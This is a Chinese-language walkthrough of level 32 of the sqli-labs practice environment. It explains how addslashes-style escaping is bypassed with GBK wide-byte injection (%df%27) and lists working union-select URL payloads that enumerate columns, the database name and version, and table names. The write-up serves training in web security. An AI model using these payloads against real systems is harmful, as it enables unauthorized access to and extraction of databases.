sqli-第三十二关——bypass addslashes

一:宽字节注入

先查看源码

观察转义函数 check_addslashes()里面的三行表达式

第一行

复制代码
 $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);  

part1: '/'. preg_quote('\\') .'/'

转义了反斜杠:假设我们输入a\b

先在preg_quote进行第一层转义,将 \ 转义为两个反斜杠,输出 /\\/

然后再替换字符串 \\\\\\,实际表示出三个反斜杠,因为第一\是php解析层,解析完变成 \\\\,第二圈是正则表达式解析层,所以实际表示三个反斜杠

所以会输出a\\\b;

作用:把字符串所有的 \ 替换成 \\

第二行

复制代码
$string = preg_replace('/\'/i', '\\\'', $string);

作用:把所有的 ' 替换成 \'

第三行

复制代码
$string = preg_replace('/\"/', "\\\"", $string);

作用:把所有的 " 替换成 \"

反斜杠( \ )在编程中是转义字符,可以让后面的特殊字符失去其特殊意义

例如,\' 表示 " 这是一个普通的单引号,不是SQL语句的结束符 "

宽字节的格式是在地址后面加一个%df,再加单引号,

因为反斜杠的编码是%5c,连起来%df&5c对应GBK编码中的 ' 運 ' 字,也就是说,数据库实际看到的是

复制代码
SELECT * FROM users WHERE id='運' OR 1=1 --'

这样单引号就成功逃逸出来了,也就是说 or 1=1的恶意代码执行了

二:判断闭合类型

输入?id=1',可以通过提示发现被转义了

我们尝试宽字节注入 ,成功报错

复制代码
?id=1%df%27

--+尝试闭合

​编辑 文章

闭合成功

三:开始注入:

1.爆列数

复制代码
?id=1%df%27%20order%20by%201,2,3,4--+

2.爆回显位

复制代码
?id=-1%df%27%20union%20select%201,2,3--+

3.爆库名和版本号

复制代码
?id=-1%df%27%20union%20select%201,database(),version()--+

4.联合查询爆表名,行数:

复制代码
?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+

❀❀❀ 完结撒花!!!❀❀❀

相关推荐
YQ_ZJH4 分钟前
Spring Boot 如何校验前端传递的参数
前端·spring boot·后端
报错小能手7 分钟前
linux学习笔记(18)进程间通讯——共享内存
linux·服务器·前端
. . . . .8 分钟前
数据库迁移migration
数据库
魔云连洲14 分钟前
深入解析:Object.prototype.toString.call() 的工作原理与实战应用
前端·javascript·原型模式
第四维度414 分钟前
【全志V821_FoxPi】6-2 IMX219 MIPI摄像头适配
linux·ipc·tina·v821·imx219
杜子不疼.17 分钟前
【Linux】进程的初步探险:基本概念与基本操作
linux·人工智能·ai
JinSo22 分钟前
alien-signals 系列 —— 认识下一代响应式框架
前端·javascript·github
开心不就得了29 分钟前
Glup 和 Vite
前端·javascript
szial31 分钟前
React 快速入门:菜谱应用实战教程
前端·react.js·前端框架
shixian103041132 分钟前
Django 学习日志
数据库·学习·sqlite